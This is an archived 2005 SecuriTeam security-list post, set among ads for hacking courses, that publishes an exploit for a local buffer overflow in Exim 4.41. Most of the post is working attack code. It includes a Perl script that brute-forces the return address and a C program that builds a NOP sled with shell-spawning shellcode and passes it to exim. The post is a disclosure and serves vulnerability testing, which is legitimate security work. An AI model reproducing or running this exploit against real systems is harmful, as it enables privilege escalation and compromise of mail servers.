Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]

[EXPL] Exim dns_buld_reverse() Exploit

Subject: [EXPL] Exim dns_buld_reverse() Exploit
Date: 16 Jan 2005 10:47:27 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Exim dns_buld_reverse() Exploit
------------------------------------------------------------------------


SUMMARY

 <http://www.exim.org/> Exim is "a mail transfer agent (MTA) for UNIX 
systems similar to Sendmail". Local exploitation of a buffer overflow 
vulnerability in Exim 4.41 allows execution of arbitrary commands with 
elevated privileges. The following exploit code can be used to test the 
vulnerability.

DETAILS

Exploit:
Note that setuid () is not included in the shellcode to avoid 
script-kidding. My RET is 0xbffffae4, but fb.pl can brute-force it for 
you.

fb.pl
#!/usr/bin/perl

$cnt = 0xbffffa10;

while (1) {
    $hex = sprintf ("0x%x", $cnt);
    $res = system ("./exploit $hex");
    printf "$hex : $res\n";
    $cnt += 4;
}

exploit.c
#define NOP 0x90
#define TAMBUF 368
#define INIC_SH 20
#include <stdlib.h>

int main (int argc, char **argv) {

    static char shellcode[]=
    "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"
    "\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e"
    "\x2f\x73\x68\x58";

    char buffer [TAMBUF + 1];
    char cadena [TAMBUF + 5];
    int cont;
    unsigned long ret = strtoul (argv[1], NULL, 16);

    for (cont = 0; cont < TAMBUF / 4; cont++)
            *( (long *) buffer + cont) = ret;

    for (cont = 0; cont < strlen (shellcode); cont++)
            buffer [cont + INIC_SH] = shellcode [cont];

    for (cont = 0; cont < INIC_SH; cont++)
            buffer [cont] = NOP;

    buffer [TAMBUF] = 0;
    printf ("RET = 0x%x\n", ret);
    strcpy (cadena, "::%A");
    strcat (cadena, buffer);
        execl ("./exim", "./exim", "-bh", cadena, (char *) 0);
}


ADDITIONAL INFORMATION

The information has been provided by  <mailto:smcsoc@yahoo.es> Rafael San 
Miguel Carrasco.



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages. 




<Prev in Thread] Current Thread [Next in Thread>
  • [EXPL] Exim dns_buld_reverse() Exploit, SecuriTeam <=